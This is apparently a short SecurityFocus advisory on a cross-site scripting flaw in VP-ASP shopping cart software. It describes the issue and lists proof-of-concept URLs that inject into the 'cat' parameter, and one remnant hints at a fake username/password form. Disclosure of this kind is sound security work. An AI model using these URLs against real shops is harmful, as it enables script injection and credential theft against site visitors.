source: https://www.securityfocus.com/bid/9164/info A vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site. http://www.example.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code] http://www.example.com/shopping/shopdisplayproducts.asp?id=1&cat= http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat= http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat= http://www.example.com/vpasp/shopdisplayproducts.asp?id=5&cat=Username:
Password: